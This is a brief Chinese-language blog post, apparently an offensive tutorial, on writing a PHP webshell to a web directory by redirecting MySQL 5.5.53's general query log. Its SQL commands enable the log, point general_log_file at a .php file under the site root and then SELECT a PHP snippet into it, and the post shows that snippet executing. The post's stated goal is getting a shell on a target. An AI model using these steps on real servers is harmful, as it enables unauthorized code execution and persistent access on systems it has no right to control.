mysql利用log写入webshell(测试版本5.5.53)

  • 内容
  • 相关
et_highlighter51

0x01    前言

新版本的mysql在my.ini中设置了导出文件的路径,无法再使用select into outfile来写入一句话

mysql利用log写入webshell(测试版本5.5.53)

此时在mysql文件夹下的my.ini中可以设置到处路径

mysql利用log写入webshell(测试版本5.5.53)

但是在拿shell时,不可能去修改配置文件

可以通过修改mysql的log文件来获取webshell

0x02    过程

首先进入SQL环境,执行以下SQL语句:

show variables like "%general%";

mysql利用log写入webshell(测试版本5.5.53)

修改如上两个地方的值,其中修改log的地址为网站目录下的php文件,其后log文件会写入其中,修改方法

set global general_log = on;set global general_log_file = "C:/phpStudy/PHPTutorial/MySQL/6.php";

 然后执行

select "<?php echo 12344;?>"


此时在网站目录下6.PHP中就生成了一句话

mysql利用log写入webshell(测试版本5.5.53)

mysql利用log写入webshell(测试版本5.5.53)

成功执行。


  • 打赏支付宝扫一扫
  • 打赏微信扫一扫
  • 打赏企鹅扫一扫

本文标签:

版权声明:若无特殊注明,本文皆为《Mushroom》原创,转载请保留文章出处。

本文链接:mysql利用log写入webshell(测试版本5.5.53) - http://www.0xmg.com/post-1599.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注